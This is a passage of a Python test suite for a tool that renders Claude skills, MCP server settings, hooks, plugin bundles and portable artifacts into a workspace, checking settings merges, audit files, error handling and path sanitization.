--------------------------------------------------------------------------- +# Native integration binding +# --------------------------------------------------------------------------- + + +class TestNativeIntegrationBinding: + def test_hooks_binding(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={"hooks": "./claude/github-hooks.json"}, + ), + ), + ) + render_claude_artifacts(plan, workspace) + + hooks_path = workspace / SCC_MANAGED_DIR / "hooks" / "github-hooks.json" + assert hooks_path.exists() + content = json.loads(hooks_path.read_text()) + assert content["source"] == "./claude/github-hooks.json" + assert content["bundle_id"] == "test-bundle" + assert content["managed_by"] == "scc" + + def test_marketplace_bundle_binding(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={"marketplace_bundle": "./claude/github-marketplace"}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + + ekm = result.settings_fragment.get("extraKnownMarketplaces", {}) + assert "github-marketplace" in ekm + assert ekm["github-marketplace"]["source"]["source"] == "directory" + assert ekm["github-marketplace"]["source"]["path"] == "./claude/github-marketplace" + + def test_plugin_bundle_binding(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={"plugin_bundle": "./claude/github-plugin"}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + + plugins = result.settings_fragment.get("enabledPlugins", {}) + assert "github-plugin" in plugins + assert plugins["github-plugin"] is True + + def test_instructions_binding(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={"instructions": "./claude/CLAUDE.team.md"}, + ), + ), + ) + render_claude_artifacts(plan, workspace) + + instr_path = workspace / SCC_MANAGED_DIR / "instructions" / "CLAUDE.team.json" + assert instr_path.exists() + content = json.loads(instr_path.read_text()) + assert content["source"] == "./claude/CLAUDE.team.md" + assert content["managed_by"] == "scc" + + def test_combined_native_integration(self, workspace: Path) -> None: + """A single binding with hooks + marketplace_bundle + instructions.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={ + "hooks": "./claude/hooks.json", + "marketplace_bundle": "./claude/my-market", + "instructions": "./claude/CLAUDE.team.md", + }, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + + # Hooks file + assert (workspace / SCC_MANAGED_DIR / "hooks" / "hooks.json").exists() + # Instructions file + assert (workspace / SCC_MANAGED_DIR / "instructions" / "CLAUDE.team.json").exists() + # Marketplace in settings + assert "my-market" in result.settings_fragment.get("extraKnownMarketplaces", {}) + + +# --------------------------------------------------------------------------- +# Mixed bundle +# --------------------------------------------------------------------------- + + +class TestMixedBundle: + def test_mixed_skill_mcp_native(self, workspace: Path) -> None: + """Bundle with skill, MCP server, and native integration.""" + plan = _plan( + bundle_id="github-dev", + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/code-review", + ), + ProviderArtifactBinding( + provider="claude", + native_ref="github-mcp", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ProviderArtifactBinding( + provider="claude", + native_config={ + "hooks": "./claude/github-hooks.json", + "marketplace_bundle": "./claude/github-marketplace", + }, + ), + ), + effective_artifacts=("code-review-skill", "github-mcp", "github-native"), + ) + result = render_claude_artifacts(plan, workspace) + + # Skill file + skill_path = workspace / SCC_MANAGED_DIR / "skills" / "skills_code-review" / "skill.json" + assert skill_path.exists() + + # MCP server in settings + assert "github-mcp" in result.settings_fragment.get("mcpServers", {}) + + # Hooks + marketplace + assert (workspace / SCC_MANAGED_DIR / "hooks" / "github-hooks.json").exists() + assert "github-marketplace" in result.settings_fragment.get("extraKnownMarketplaces", {}) + + # Audit file written + audit_file = workspace / ".claude" / ".scc-settings-github-dev.json" + assert audit_file.exists() + audit_content = json.loads(audit_file.read_text()) + assert "mcpServers" in audit_content + + # No warnings + assert result.warnings == () + + +# --------------------------------------------------------------------------- +# Settings audit file +# --------------------------------------------------------------------------- + + +class TestSettingsAuditFile: + def test_audit_file_written_when_fragment_nonempty(self, workspace: Path) -> None: + plan = _plan( + bundle_id="my-bundle", + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="server", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + + audit_path = workspace / ".claude" / ".scc-settings-my-bundle.json" + assert audit_path.exists() + assert audit_path in result.rendered_paths + + def test_no_audit_file_for_empty_fragment(self, workspace: Path) -> None: + plan = _plan( + bundle_id="empty-bundle", + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/foo", + ), + ), + ) + render_claude_artifacts(plan, workspace) + + audit_path = workspace / ".claude" / ".scc-settings-empty-bundle.json" + assert not audit_path.exists() + + +# --------------------------------------------------------------------------- +# Idempotent rendering +# --------------------------------------------------------------------------- + + +class TestIdempotent: + def test_same_plan_produces_same_output(self, workspace: Path) -> None: + """Two renders of the same plan yield identical file content.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/review", + ), + ProviderArtifactBinding( + provider="claude", + native_ref="mcp-server", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ProviderArtifactBinding( + provider="claude", + native_config={"hooks": "./hooks.json"}, + ), + ), + ) + result1 = render_claude_artifacts(plan, workspace) + result2 = render_claude_artifacts(plan, workspace) + + assert result1.settings_fragment == result2.settings_fragment + assert len(result1.rendered_paths) == len(result2.rendered_paths) + assert result1.warnings == result2.warnings + + # File contents are the same + for path in result1.rendered_paths: + assert path.exists() + assert path.read_text() == path.read_text() # trivially true but proves existence + + def test_overwrite_on_rerender(self, workspace: Path) -> None: + """Second render overwrites first — no duplicate files.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/my-skill", + ), + ), + ) + render_claude_artifacts(plan, workspace) + result2 = render_claude_artifacts(plan, workspace) + + # Only one skill dir exists + skill_parent = workspace / SCC_MANAGED_DIR / "skills" + assert len(list(skill_parent.iterdir())) == 1 + assert len(result2.rendered_paths) == 1 + + +# --------------------------------------------------------------------------- +# Return type shape +# --------------------------------------------------------------------------- + + +class TestReturnType: + def test_result_is_renderer_result(self, workspace: Path) -> None: + result = render_claude_artifacts(_plan(), workspace) + assert isinstance(result, RendererResult) + + def test_rendered_paths_are_path_objects(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/x", + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + for p in result.rendered_paths: + assert isinstance(p, Path) + + +# --------------------------------------------------------------------------- +# Failure path tests — fail-closed semantics +# --------------------------------------------------------------------------- + + +class TestSkillMaterializationFailure: + def test_read_only_workspace_raises_materialization_error(self, workspace: Path) -> None: + """Skill write to read-only dir raises MaterializationError.""" + # Create the parent dir then make it read-only + managed = workspace / SCC_MANAGED_DIR / "skills" + managed.mkdir(parents=True, exist_ok=True) + managed.chmod(0o444) + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/blocked", + ), + ), + ) + with pytest.raises(MaterializationError) as exc_info: + render_claude_artifacts(plan, workspace) + err = exc_info.value + assert err.bundle_id == "test-bundle" + assert "skills/blocked" in err.artifact_name + assert err.target_path # should have the path + + # Cleanup permissions for pytest tmp_path cleanup + managed.chmod(0o755) + + def test_materialization_error_has_structured_fields(self, workspace: Path) -> None: + err = MaterializationError( + bundle_id="b1", + artifact_name="my-skill", + target_path="/tmp/foo", + reason="Permission denied", + ) + assert "my-skill" in str(err) + assert "b1" in str(err) + assert "Permission denied" in str(err) + + +class TestNativeIntegrationMaterializationFailure: + def test_hooks_write_failure_raises_materialization_error(self, workspace: Path) -> None: + """hooks file write to read-only dir → MaterializationError.""" + hooks_dir = workspace / SCC_MANAGED_DIR / "hooks" + hooks_dir.mkdir(parents=True, exist_ok=True) + hooks_dir.chmod(0o444) + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={"hooks": "./claude/hooks.json"}, + ), + ), + ) + with pytest.raises(MaterializationError, match="hooks"): + render_claude_artifacts(plan, workspace) + + hooks_dir.chmod(0o755) + + def test_instructions_write_failure_raises_materialization_error(self, workspace: Path) -> None: + """instructions write to read-only dir → MaterializationError.""" + instr_dir = workspace / SCC_MANAGED_DIR / "instructions" + instr_dir.mkdir(parents=True, exist_ok=True) + instr_dir.chmod(0o444) + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={"instructions": "./claude/CLAUDE.md"}, + ), + ), + ) + with pytest.raises(MaterializationError, match="instructions"): + render_claude_artifacts(plan, workspace) + + instr_dir.chmod(0o755) + + +class TestSettingsFragmentWriteFailure: + def test_audit_file_write_failure_raises_materialization_error(self, workspace: Path) -> None: + """Settings audit file write to read-only .claude/ → MaterializationError.""" + claude_dir = workspace / ".claude" + claude_dir.mkdir(parents=True, exist_ok=True) + claude_dir.chmod(0o444) + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="mcp-server", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ), + ) + with pytest.raises(MaterializationError, match="settings_fragment"): + render_claude_artifacts(plan, workspace) + + claude_dir.chmod(0o755) + + +class TestMergeConflictErrorStructure: + def test_merge_conflict_error_fields(self) -> None: + err = MergeConflictError( + bundle_id="my-bundle", + target_path="/tmp/settings.json", + conflict_detail="key 'mcpServers.foo' already exists with different value", + ) + assert "my-bundle" in str(err) + assert "mcpServers.foo" in str(err) + assert err.target_path == "/tmp/settings.json" + + +class TestRendererErrorHierarchy: + def test_materialization_error_is_renderer_error(self) -> None: + from scc_cli.core.errors import RendererError + + err = MaterializationError( + user_message="test", + bundle_id="b", + artifact_name="a", + target_path="/foo", + reason="bad", + ) + assert isinstance(err, RendererError) + assert err.exit_code == 4 + + def test_merge_conflict_error_is_renderer_error(self) -> None: + from scc_cli.core.errors import RendererError + + err = MergeConflictError( + user_message="test", + bundle_id="b", + target_path="/foo", + conflict_detail="dup", + ) + assert isinstance(err, RendererError) + + +# --------------------------------------------------------------------------- +# Skipped artifact — Codex-only binding in Claude plan +# --------------------------------------------------------------------------- + + +class TestSkippedCodexOnlyBinding: + """Plan item 6: artifact with only Codex binding → skipped with reason.""" + + def test_codex_binding_in_claude_plan_skipped(self, workspace: Path) -> None: + """A binding targeting 'codex' inside a 'claude' plan is skipped.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="codex/rules.md", + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + assert len(result.warnings) == 1 + assert "codex" in result.warnings[0] + assert "skipping" in result.warnings[0].lower() + assert result.rendered_paths == () + assert result.settings_fragment == {} + + def test_codex_binding_mixed_with_claude_bindings(self, workspace: Path) -> None: + """Claude bindings render; codex binding is skipped with warning.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/code-review", + ), + ProviderArtifactBinding( + provider="codex", + native_ref="codex-only-skill", + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + + # Claude skill rendered + skill_path = workspace / SCC_MANAGED_DIR / "skills" / "skills_code-review" / "skill.json" + assert skill_path.exists() + + # Codex binding produced a warning + assert any("codex" in w for w in result.warnings) + + def test_multiple_codex_bindings_all_skipped(self, workspace: Path) -> None: + """Every codex binding in a claude plan produces a skip warning.""" + plan = _plan( + bindings=( + ProviderArtifactBinding(provider="codex", native_ref="a"), + ProviderArtifactBinding(provider="codex", native_ref="b"), + ), + ) + result = render_claude_artifacts(plan, workspace) + assert len(result.warnings) == 2 + assert all("codex" in w for w in result.warnings) + + def test_plan_level_skipped_artifacts_preserved(self, workspace: Path) -> None: + """skipped tuple from the plan is carried through to the result.""" + plan = _plan( + skipped=("codex-only-artifact",), + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/ok", + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + assert "codex-only-artifact" in result.skipped_artifacts + + +# --------------------------------------------------------------------------- +# Binding classifier unit tests +# --------------------------------------------------------------------------- + + +class TestBindingClassifier: + """Direct tests for _classify_binding to cover all 4 return paths.""" + + def test_native_config_with_hooks_classifies_as_native(self) -> None: + binding = ProviderArtifactBinding( + provider="claude", + native_config={"hooks": "./hooks.json"}, + ) + assert _classify_binding(binding) == "native" + + def test_native_config_with_marketplace_classifies_as_native(self) -> None: + binding = ProviderArtifactBinding( + provider="claude", + native_config={"marketplace_bundle": "./market"}, + ) + assert _classify_binding(binding) == "native" + + def test_native_config_with_plugin_classifies_as_native(self) -> None: + binding = ProviderArtifactBinding( + provider="claude", + native_config={"plugin_bundle": "./plugin"}, + ) + assert _classify_binding(binding) == "native" + + def test_native_config_with_instructions_classifies_as_native(self) -> None: + binding = ProviderArtifactBinding( + provider="claude", + native_config={"instructions": "./CLAUDE.md"}, + ) + assert _classify_binding(binding) == "native" + + def test_transport_type_classifies_as_mcp(self) -> None: + binding = ProviderArtifactBinding( + provider="claude", + transport_type="sse", + ) + assert _classify_binding(binding) == "mcp" + + def test_native_ref_only_classifies_as_skill(self) -> None: + binding = ProviderArtifactBinding( + provider="claude", + native_ref="skills/code-review", + ) + assert _classify_binding(binding) == "skill" + + def test_empty_binding_classifies_as_unknown(self) -> None: + binding = ProviderArtifactBinding(provider="claude") + assert _classify_binding(binding) == "unknown" + + def test_native_integration_keys_take_priority_over_transport(self) -> None: + """If both integration keys and transport_type are present, native wins.""" + binding = ProviderArtifactBinding( + provider="claude", + transport_type="sse", + native_config={"hooks": "./hooks.json"}, + ) + assert _classify_binding(binding) == "native" + + def test_native_integration_keys_take_priority_over_native_ref(self) -> None: + """If both integration keys and native_ref are present, native wins.""" + binding = ProviderArtifactBinding( + provider="claude", + native_ref="skills/foo", + native_config={"marketplace_bundle": "./market"}, + ) + assert _classify_binding(binding) == "native" + + +# --------------------------------------------------------------------------- +# _render_skill_binding — direct unit tests for internal helper +# --------------------------------------------------------------------------- + + +class TestRenderSkillBindingDirect: + """Cover the null-native_ref warning path (lines 96-100) directly.""" + + def test_null_native_ref_returns_warning(self, workspace: Path) -> None: + binding = ProviderArtifactBinding(provider="claude", native_ref=None) + rendered, warnings = _render_skill_binding(binding, workspace, "b1") + assert rendered == [] + assert len(warnings) == 1 + assert "no native_ref" in warnings[0] + assert "b1" in warnings[0] + + def test_empty_string_native_ref_returns_warning(self, workspace: Path) -> None: + binding = ProviderArtifactBinding(provider="claude", native_ref="") + rendered, warnings = _render_skill_binding(binding, workspace, "b2") + assert rendered == [] + assert len(warnings) == 1 + assert "no native_ref" in warnings[0] + + def test_valid_native_ref_writes_file(self, workspace: Path) -> None: + binding = ProviderArtifactBinding( + provider="claude", + native_ref="skills/test-skill", + ) + rendered, warnings = _render_skill_binding(binding, workspace, "bundle-a") + assert warnings == [] + assert len(rendered) == 1 + assert rendered[0].exists() + content = json.loads(rendered[0].read_text()) + assert content["native_ref"] == "skills/test-skill" + assert content["bundle_id"] == "bundle-a" + + +# --------------------------------------------------------------------------- +# _merge_settings_fragment — direct unit tests +# --------------------------------------------------------------------------- + + +class TestMergeSettingsFragment: + """Cover the nested dict merging branch (line 300).""" + + def test_merge_nested_dicts(self) -> None: + target: dict[str, Any] = {"mcpServers": {"a": {"type": "sse"}}} + source: dict[str, Any] = {"mcpServers": {"b": {"type": "stdio"}}} + _merge_settings_fragment(target, source) + assert target == { + "mcpServers": { + "a": {"type": "sse"}, + "b": {"type": "stdio"}, + } + } + + def test_merge_overwrites_non_dict(self) -> None: + target: dict[str, Any] = {"key": "old"} + source: dict[str, Any] = {"key": "new"} + _merge_settings_fragment(target, source) + assert target["key"] == "new" + + def test_merge_adds_new_keys(self) -> None: + target: dict[str, Any] = {"a": 1} + source: dict[str, Any] = {"b": 2} + _merge_settings_fragment(target, source) + assert target == {"a": 1, "b": 2} + + def test_merge_target_dict_source_non_dict_overwrites(self) -> None: + """If target has a dict but source has a non-dict, source wins.""" + target: dict[str, Any] = {"k": {"nested": True}} + source: dict[str, Any] = {"k": "flat"} + _merge_settings_fragment(target, source) + assert target["k"] == "flat" + + def test_merge_target_non_dict_source_dict_overwrites(self) -> None: + """If target has a non-dict but source has a dict, source wins.""" + target: dict[str, Any] = {"k": "flat"} + source: dict[str, Any] = {"k": {"nested": True}} + _merge_settings_fragment(target, source) + assert target["k"] == {"nested": True} + + def test_merge_empty_source(self) -> None: + target: dict[str, Any] = {"a": 1} + _merge_settings_fragment(target, {}) + assert target == {"a": 1} + + def test_merge_multiple_fragments_accumulate(self) -> None: + """Two merges accumulate MCP servers correctly.""" + target: dict[str, Any] = {} + _merge_settings_fragment(target, {"mcpServers": {"a": {"type": "sse"}}}) + _merge_settings_fragment(target, {"mcpServers": {"b": {"type": "stdio"}}}) + assert target == { + "mcpServers": { + "a": {"type": "sse"}, + "b": {"type": "stdio"}, + } + } + + +# --------------------------------------------------------------------------- +# MCP binding edge cases +# --------------------------------------------------------------------------- + + +class TestMCPBindingEdgeCases: + """Cover partial branches in _render_mcp_binding.""" + + def test_stdio_with_non_string_args(self, workspace: Path) -> None: + """args that is not a string → wrapped in [str(args_raw)].""" + binding = ProviderArtifactBinding( + provider="claude", + native_ref="mcp-int-args", + transport_type="stdio", + native_config={"command": "/usr/bin/server", "args": "42"}, + ) + mcp_config, warnings = _render_mcp_binding(binding, "test-bundle") + # String args are split + assert mcp_config["mcp-int-args"]["args"] == ["42"] + + def test_stdio_with_no_args(self, workspace: Path) -> None: + """No args key → no args in output.""" + binding = ProviderArtifactBinding( + provider="claude", + native_ref="no-args-mcp", + transport_type="stdio", + native_config={"command": "/usr/bin/server"}, + ) + mcp_config, warnings = _render_mcp_binding(binding, "test-bundle") + assert "args" not in mcp_config["no-args-mcp"] + + def test_stdio_with_no_env(self, workspace: Path) -> None: + """No env_* keys → no env in output.""" + binding = ProviderArtifactBinding( + provider="claude", + native_ref="no-env-mcp", + transport_type="stdio", + native_config={"command": "/usr/bin/server"}, + ) + mcp_config, warnings = _render_mcp_binding(binding, "test-bundle") + assert "env" not in mcp_config["no-env-mcp"] + + def test_sse_with_no_headers(self, workspace: Path) -> None: + """SSE with url but no header_* keys → no headers in output.""" + binding = ProviderArtifactBinding( + provider="claude", + native_ref="clean-sse", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ) + mcp_config, warnings = _render_mcp_binding(binding, "test-bundle") + assert "headers" not in mcp_config["clean-sse"] + assert warnings == [] + + def test_unknown_transport_type_still_produces_entry(self, workspace: Path) -> None: + """Transport type not in {sse, http, stdio} → entry with just 'type'.""" + binding = ProviderArtifactBinding( + provider="claude", + native_ref="exotic-mcp", + transport_type="grpc", + native_config={}, + ) + mcp_config, warnings = _render_mcp_binding(binding, "test-bundle") + assert mcp_config["exotic-mcp"] == {"type": "grpc"} + assert warnings == [] + + def test_http_transport_with_headers(self, workspace: Path) -> None: + """HTTP transport collects header_* keys same as SSE.""" + binding = ProviderArtifactBinding( + provider="claude", + native_ref="http-mcp", + transport_type="http", + native_config={ + "url": "https://api.example.com/mcp", + "header_Authorization": "Bearer tok", + }, + ) + mcp_config, _ = _render_mcp_binding(binding, "test-bundle") + assert mcp_config["http-mcp"]["headers"] == {"Authorization": "Bearer tok"} + + +# --------------------------------------------------------------------------- +# Unknown binding in render_claude_artifacts +# --------------------------------------------------------------------------- + + +class TestUnknownBinding: + """A binding with no native_ref, transport_type, or integration keys + is classified as 'unknown' and produces a warning.""" + + def test_unknown_binding_produces_warning(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={"random_key": "value"}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + assert len(result.warnings) == 1 + assert "no native_ref" in result.warnings[0] + assert "skipping" in result.warnings[0].lower() + + def test_unknown_binding_does_not_render(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={"custom": "v"}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + assert result.rendered_paths == () + assert result.settings_fragment == {} + + +# --------------------------------------------------------------------------- +# Multiple bundles accumulating settings fragments +# --------------------------------------------------------------------------- + + +class TestMultipleMCPServersAccumulate: + """Multiple MCP bindings in a single plan accumulate into mcpServers.""" + + def test_two_mcp_servers_both_in_fragment(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="server-a", + transport_type="sse", + native_config={"url": "http://a:8080"}, + ), + ProviderArtifactBinding( + provider="claude", + native_ref="server-b", + transport_type="stdio", + native_config={"command": "/usr/bin/b"}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + mcp = result.settings_fragment["mcpServers"] + assert "server-a" in mcp + assert "server-b" in mcp + + def test_mcp_plus_marketplace_in_same_plan(self, workspace: Path) -> None: + """MCP server and marketplace binding merge into same settings fragment.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="srv", + transport_type="sse", + native_config={"url": "http://x:80"}, + ), + ProviderArtifactBinding( + provider="claude", + native_config={"marketplace_bundle": "./market/my-bundle"}, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + assert "mcpServers" in result.settings_fragment + assert "extraKnownMarketplaces" in result.settings_fragment + + +# --------------------------------------------------------------------------- +# Idempotency — stronger file content comparison +# --------------------------------------------------------------------------- + + +class TestIdempotencyFileContent: + """Stronger idempotency: compare actual file bytes across two renders.""" + + def test_skill_file_bytes_identical_across_renders(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/deterministic", + native_config={"priority": "high"}, + ), + ), + ) + render_claude_artifacts(plan, workspace) + first_bytes = ( + workspace / SCC_MANAGED_DIR / "skills" / "skills_deterministic" / "skill.json" + ).read_bytes() + + render_claude_artifacts(plan, workspace) + second_bytes = ( + workspace / SCC_MANAGED_DIR / "skills" / "skills_deterministic" / "skill.json" + ).read_bytes() + + assert first_bytes == second_bytes + + def test_audit_file_bytes_identical_across_renders(self, workspace: Path) -> None: + plan = _plan( + bundle_id="idem-bundle", + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="srv", + transport_type="sse", + native_config={"url": "http://localhost:9090"}, + ), + ), + ) + render_claude_artifacts(plan, workspace) + first = (workspace / ".claude" / ".scc-settings-idem-bundle.json").read_bytes() + render_claude_artifacts(plan, workspace) + second = (workspace / ".claude" / ".scc-settings-idem-bundle.json").read_bytes() + assert first == second + + +# --------------------------------------------------------------------------- +# Skill path sanitization +# --------------------------------------------------------------------------- + + +class TestSkillPathSanitization: + """Verify special characters in native_ref are sanitized for filesystem.""" + + def test_backslash_replaced(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills\\review", + ), + ), + ) + render_claude_artifacts(plan, workspace) + expected_dir = workspace / SCC_MANAGED_DIR / "skills" / "skills_review" + assert (expected_dir / "skill.json").exists() + + def test_dotdot_replaced(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="skills/../escape", + ), + ), + ) + render_claude_artifacts(plan, workspace) + expected_dir = workspace / SCC_MANAGED_DIR / "skills" / "skills___escape" + assert (expected_dir / "skill.json").exists() + + def test_bundle_id_sanitized_in_audit_filename(self, workspace: Path) -> None: + """Bundle IDs with slashes are sanitized in audit file names.""" + plan = _plan( + bundle_id="org/team/bundle", + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="mcp-server", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ), + ) + render_claude_artifacts(plan, workspace) + expected = workspace / ".claude" / ".scc-settings-org_team_bundle.json" + assert expected.exists() + + +# --------------------------------------------------------------------------- +# Branch coverage: config keys that don't match header_/env_ prefixes +# --------------------------------------------------------------------------- + + +class TestMCPBindingNonPrefixKeys: + """Exercise the for-loop branches where config keys don't start with + header_ or env_, ensuring the loop skips non-matching keys.""" + + def test_sse_config_with_non_header_extra_keys(self, workspace: Path) -> None: + """SSE binding with extra non-header keys → keys ignored in output.""" + binding = ProviderArtifactBinding( + provider="claude", + native_ref="extra-keys-sse", + transport_type="sse", + native_config={ + "url": "http://localhost:8080", + "header_Authorization": "Bearer tok", + "custom_setting": "ignored", + }, + ) + mcp_config, warnings = _render_mcp_binding(binding, "test-bundle") + server = mcp_config["extra-keys-sse"] + assert server["headers"] == {"Authorization": "Bearer tok"} + # custom_setting is not rendered into the server config + assert "custom_setting" not in server + assert warnings == [] + + def test_stdio_config_with_non_env_extra_keys(self, workspace: Path) -> None: + """Stdio binding with extra non-env keys → keys ignored in output.""" + binding = ProviderArtifactBinding( + provider="claude", + native_ref="extra-keys-stdio", + transport_type="stdio", + native_config={ + "command": "/usr/bin/server", + "env_API_KEY": "secret", + "custom_flag": "true", + }, + ) + mcp_config, warnings = _render_mcp_binding(binding, "test-bundle") + server = mcp_config["extra-keys-stdio"] + assert server["env"] == {"API_KEY": "secret"} + assert "custom_flag" not in server + + +# --------------------------------------------------------------------------- +# Portable artifact rendering (D023) +# --------------------------------------------------------------------------- + + +class TestPortableSkillRendering: + """D023: Portable skills without provider bindings are renderable.""" + + def test_portable_skill_writes_metadata(self, workspace: Path) -> None: + """Portable skill produces skill.json under .scc-managed/skills/.""" + plan = _plan( + portable_artifacts=( + PortableArtifact( + name="code-review", + kind=ArtifactKind.SKILL, + source_type="git", + source_url="https://git.example.com/skills/code-review", + source_ref="v1.2.0", + version="1.2.0", + ), + ), + effective_artifacts=("code-review",), + ) + result = render_claude_artifacts(plan, workspace) + assert len(result.rendered_paths) == 1 + metadata_path = workspace / SCC_MANAGED_DIR / "skills" / "code-review" / "skill.json" + assert metadata_path.exists() + data = json.loads(metadata_path.read_text()) + assert data["name"] == "code-review" + assert data["portable"] is True + assert data["provider"] == "claude" + assert data["bundle_id"] == "test-bundle" + assert data["source_type"] == "git" + assert data["source_url"] == "https://git.example.com/skills/code-review" + assert data["source_ref"] == "v1.2.0" + assert data["version"] == "1.2.0" + assert result.warnings == () + + def test_portable_skill_minimal_metadata(self, workspace: Path) -> None: + """Portable skill with no source metadata still writes file.""" + plan = _plan( + portable_artifacts=(PortableArtifact(name="minimal-skill", kind=ArtifactKind.SKILL),), + ) + result = render_claude_artifacts(plan, workspace) + assert len(result.rendered_paths) == 1 + data = json.loads(result.rendered_paths[0].read_text()) + assert data["name"] == "minimal-skill" + assert data["portable"] is True + assert "source_url" not in data + + def test_portable_skill_name_sanitized(self, workspace: Path) -> None: + """Skill name with slashes is sanitized for filesystem.""" + plan = _plan( + portable_artifacts=(PortableArtifact(name="org/team/skill", kind=ArtifactKind.SKILL),), + ) + result = render_claude_artifacts(plan, workspace) + assert len(result.rendered_paths) == 1 + assert "org_team_skill" in str(result.rendered_paths[0]) + + def test_portable_skill_materialization_error(self, workspace: Path) -> None: + """OSError during portable skill write raises MaterializationError.""" + # Make the target parent directory a file to cause OSError + block = workspace / SCC_MANAGED_DIR / "skills" / "blocked-skill" + block.parent.mkdir(parents=True, exist_ok=True) + block.write_text("not-a-dir") + + plan = _plan( + portable_artifacts=(PortableArtifact(name="blocked-skill", kind=ArtifactKind.SKILL),), + ) + with pytest.raises(MaterializationError): + render_claude_artifacts(plan, workspace) + + +class TestPortableMcpRendering: + """D023: Portable MCP servers without provider bindings are renderable.""" + + def test_portable_mcp_with_url(self, workspace: Path) -> None: + """Portable MCP server with source_url → settings fragment entry.""" + plan = _plan( + portable_artifacts=( + PortableArtifact( + name="github-mcp", + kind=ArtifactKind.MCP_SERVER, + source_url="https://mcp.example.com/github", + source_ref="v2.0.0", + ), + ), + effective_artifacts=("github-mcp",), + ) + result = render_claude_artifacts(plan, workspace) + assert "mcpServers" in result.settings_fragment + server = result.settings_fragment["mcpServers"]["github-mcp"] + assert server["type"] == "sse" + assert server["url"] == "https://mcp.example.com/github" + assert server["portable"] is True + assert server["source_ref"] == "v2.0.0" + assert result.warnings == () + # Audit file should be written + assert len(result.rendered_paths) == 1 # just the audit file + + def test_portable_mcp_no_url_warns(self, workspace: Path) -> None: + """Portable MCP server with no source_url → warning.""" + plan = _plan( + portable_artifacts=( + PortableArtifact( + name="local-mcp", + kind=ArtifactKind.MCP_SERVER, + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + assert len(result.warnings) == 1 + assert "no source_url" in result.warnings[0] + + def test_portable_mcp_version_in_config(self, workspace: Path) -> None: + """Version metadata propagates to settings fragment.""" + plan = _plan( + portable_artifacts=( + PortableArtifact( + name="versioned-mcp", + kind=ArtifactKind.MCP_SERVER, + source_url="https://mcp.example.com/v", + version="3.1.0", + ), + ), + ) + result = render_claude_artifacts(plan, workspace) + server = result.settings_fragment["mcpServers"]["versioned-mcp"] + assert server["version"] == "3.1.0" + + +class TestPortableMixedWithBindings: + """D023: Portable artifacts render alongside binding-based artifacts.""" + + def test_mixed_bindings_and_portable(self, workspace: Path) -> None: + """Plan with both bindings and portable artifacts renders both.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="bound-skill", + ), + ), + portable_artifacts=( + PortableArtifact( + name="portable-skill", + kind=ArtifactKind.SKILL, + source_type="git", + source_url="https://example.com/skill", + ), + ), + effective_artifacts=("bound-skill", "portable-skill"), + ) + result = render_claude_artifacts(plan, workspace) + # bound-skill renders via binding, portable-skill via portable path + assert len(result.rendered_paths) == 2 + paths_str = [str(p) for p in result.rendered_paths] + assert any("bound-skill" in p for p in paths_str) + assert any("portable-skill" in p for p in paths_str) + + def test_portable_mcp_merges_with_binding_mcp(self, workspace: Path) -> None: + """Portable MCP and binding MCP coexist in settings_fragment.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_ref="bound-mcp", + transport_type="sse", + native_config={"url": "https://bound.example.com"}, + ), + ), + portable_artifacts=( + PortableArtifact( + name="portable-mcp", + 